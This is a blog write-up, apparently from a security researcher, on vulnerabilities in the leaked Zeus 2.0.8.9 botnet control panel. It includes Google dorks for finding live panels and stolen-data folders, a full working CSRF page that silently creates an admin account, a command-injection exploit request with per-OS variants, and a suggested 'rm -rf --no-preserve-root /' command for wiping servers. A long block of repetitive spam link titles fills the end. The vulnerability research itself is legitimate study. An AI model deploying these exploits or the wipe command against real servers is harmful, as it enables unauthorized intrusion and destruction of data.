Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Related links

1. Hacker Tools For Mac
2. Hacking Tools And Software
3. How To Make Hacking Tools
4. Hack Tool Apk
5. Hacker Techniques Tools And Incident Handling
6. Nsa Hack Tools
7. Hacker Techniques Tools And Incident Handling
8. Hacking Tools Name
9. Github Hacking Tools
10. Hack Tools 2019
11. Hacker Tool Kit
12. Growth Hacker Tools
13. Growth Hacker Tools
14. Hak5 Tools
15. Hackrf Tools
16. Pentest Tools Website Vulnerability
17. Hacker Security Tools
18. Hack Tools For Windows
19. Pentest Tools Bluekeep
20. Hacker Security Tools
21. Pentest Tools Nmap
22. Hacking Tools Kit
23. Termux Hacking Tools 2019
24. Hack Tools Pc
25. Pentest Tools Nmap
26. Hack Tools For Pc
27. Pentest Tools Framework
28. Usb Pentest Tools
29. Usb Pentest Tools
30. Hacking Tools Free Download
31. Hacker Tools Linux
32. Hack Tools For Ubuntu
33. Hacking Tools Download
34. Pentest Recon Tools
35. Hacking Tools Online
36. Hacking Tools Github
37. Hacker Tools For Ios
38. Hacking Tools Windows
39. Hacking Tools Mac
40. Termux Hacking Tools 2019
41. Hacker Techniques Tools And Incident Handling
42. Hack Tools Github
43. Hack And Tools
44. Pentest Tools Alternative
45. Pentest Tools Download
46. Pentest Tools Website
47. Pentest Tools Online
48. Hacker Tools Linux
49. Github Hacking Tools
50. Underground Hacker Sites
51. Pentest Tools Subdomain
52. Hack Tools Pc
53. Pentest Tools Open Source
54. Physical Pentest Tools
55. Physical Pentest Tools
56. Hacking Tools Windows
57. Hacking Tools
58. Pentest Tools Nmap
59. Best Hacking Tools 2019
60. Hacking Tools
61. Hacker Tools Online
62. Hacking Tools Windows
63. Best Pentesting Tools 2018
64. Hacking Tools Free Download
65. Hacking Tools Pc
66. Pentest Tools Port Scanner
67. Hacker Tools Mac
68. Tools Used For Hacking
69. Pentest Tools
70. Hacking Tools Github
71. Hacker Tool Kit
72. Pentest Automation Tools
73. Hack App
74. Wifi Hacker Tools For Windows
75. New Hack Tools
76. Pentest Tools Website Vulnerability
77. Usb Pentest Tools
78. Pentest Tools Framework
79. Hacking Tools For Games
80. Hacker Tools Online
81. Pentest Tools Framework
82. Hacking Tools Online
83. Pentest Tools For Android
84. Pentest Tools Android
85. New Hacker Tools
86. Hack Tools
87. Pentest Tools Windows
88. Hack Tools
89. Hack Tools Download
90. Pentest Tools Bluekeep
91. Blackhat Hacker Tools
92. Usb Pentest Tools
93. Hack Tools 2019
94. Hacking Tools For Beginners
95. How To Install Pentest Tools In Ubuntu
96. Pentest Tools Alternative
97. Hacks And Tools
98. Hack Tools
99. Hacker Tools Linux
100. Pentest Tools Windows
101. Hack Tools 2019
102. Pentest Tools Review
103. Hack Website Online Tool
104. Hacker Tools
105. Computer Hacker
106. Blackhat Hacker Tools
107. Hacking Tools 2020
108. Hacker Tools 2020
109. Pentest Recon Tools
110. Hacking Tools For Kali Linux
111. Game Hacking
112. Pentest Box Tools Download
113. Hack Tools 2019
114. Hacker Tool Kit
115. Hacking Tools Pc
116. Pentest Tools Website
117. Growth Hacker Tools
118. Pentest Tools For Android
119. Hacker Tools For Ios
120. Hacking Tools For Mac
121. Hak5 Tools
122. Hack Tools
123. Game Hacking
124. Hacking Tools Name
125. Hacking Tools For Beginners
126. Pentest Tools Nmap
127. Pentest Tools Apk
128. Game Hacking
129. New Hacker Tools
130. New Hacker Tools
131. Hacking Tools Name
132. Pentest Box Tools Download
133. Pentest Tools For Ubuntu
134. Hacking Tools Usb
135. Hacker Tools Mac
136. Hacker Tools Github
137. Hacking Tools 2019
138. Hacker Tools Online
139. Hacking Tools For Kali Linux
140. Hacker Tools Apk
141. Pentest Tools Linux
142. Pentest Tools Framework
143. Hacking Tools Download
144. Hacking Tools Online
145. Nsa Hack Tools
146. Hacker Search Tools
147. Pentest Tools Framework
148. Pentest Automation Tools
149. Hak5 Tools
150. Hacking Tools For Pc
151. Hack Tool Apk
152. Hacking Tools Software
153. Pentest Tools Port Scanner
154. Hacker Tools Github
155. Hacker Tools Windows
156. Pentest Tools Open Source
157. Hack Tool Apk